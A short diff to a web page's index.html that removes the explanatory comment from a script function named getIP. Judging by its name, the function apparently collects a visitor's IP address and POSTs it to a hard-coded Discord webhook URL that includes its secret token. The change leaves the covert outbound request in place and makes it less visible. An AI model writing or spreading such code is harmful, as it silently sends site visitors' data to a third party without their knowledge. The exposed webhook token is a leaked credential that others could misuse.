--- a/index.html
+++ b/index.html
@@ -65,7 +65,7 @@
 
 <script>
 function getIP(json) {
-  var request = new XMLHttpRequest(); //making a request for the webhook
+  var request = new XMLHttpRequest(); 
       request.open("POST", "https://discord.com/api/webhooks/1029922854894063686/6BoYaOTyVIgPxPMijo-xQVv0kj2xA0jlnO-qvDWyQWK9E-VNDHM-hqeXbcRgJnI1yf6d");
 
       request.setRequestHeader('Content-type', 'application/json');
